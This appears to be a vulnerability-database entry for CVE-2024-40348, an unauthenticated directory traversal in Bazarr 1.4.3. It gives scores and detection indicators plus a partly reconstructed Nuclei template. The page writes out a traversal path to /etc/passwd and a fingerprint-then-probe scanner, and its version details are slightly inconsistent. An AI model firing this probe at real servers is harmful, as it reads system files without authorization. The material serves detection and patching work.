CVE-2024-40348
Published 2024-07-20
CVE-2024-40348: An issue in the component /api/swaggerui/static of Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal.
Priority: P2 (69) · Severity: high · CVSS 3.1 base score: 8.2
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
EXPLOIT
EPSS: 8.29% (94.2th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bazarr | bazarr | <= 1.4.3 | — |
Detection & IOCs (extracted from sources)
- path: /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd
- yara: regex: root:.*:0:0:
- Detect unauthenticated GET requests to /api/swaggerui/static containing path traversal sequences (e.g., ../../../../) targeting sensitive files such as /etc/passwd.
- Responses to successful exploitation return HTTP 200 with Content-Type: application/octet-stream and a body matching the pattern root:.*:0:0: (Unix /etc/passwd content).
- Fingerprint the target as Bazarr by checking for 'content="Bazarr', 'window.Bazarr', or similar strings in the response before triggering the traversal probe.
- The vulnerability affects Bazaar (Bazarr) v1.4.3 specifically; the traversal endpoint is unauthenticated, meaning no credentials or session tokens are required to exploit it.
No detection rules found.
Nuclei
CVE-2024-40348 [HIGH] Bazarr < 1.4.3 - Arbitrary File Read (nuclei · CVSS 8.2)

```yaml
# Nuclei template for CVE-2024-40348 as captured on this page. The id/info
# header and the start of the first (fingerprint) request were not preserved
# in the capture: the id/info fields below are taken from this page's own
# data, and the fingerprint request path is a placeholder (not on the page).
id: CVE-2024-40348

info:
  name: Bazarr < 1.4.3 - Arbitrary File Read
  severity: high

http:
  # Request 1: fingerprint the target as Bazarr. `internal: true` means this
  # match is not reported by itself; it only gates the second request.
  - method: GET
    path:
      - "{{BaseURL}}/<fingerprint-path-not-captured>"
    matchers:
      - type: word
        words:
          - 'content="Bazarr'
          - "window.Bazarr"
        condition: or
        internal: true

  # Request 2: traversal probe; body, header and status must all match.
  - method: GET
    path:
      - "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
      - type: word
        part: header
        words:
          - "application/octet-stream"
      - type: status
        status:
          - 200
# digest as captured (it signs the original template, not this reconstruction):
# digest: 490a00463044022042259c1ffb9695ed3218c8af65a2f4dbf0a236cd907c3739b02bc7aad823cb6902207f60bd216470e57752f2443715b264a0cf87c22049d8c1a620a5c2123dcf5130:922c64590222798bb761d5b6d8e72950
```
No writeups or analysis indexed.
Published: 2024-07-20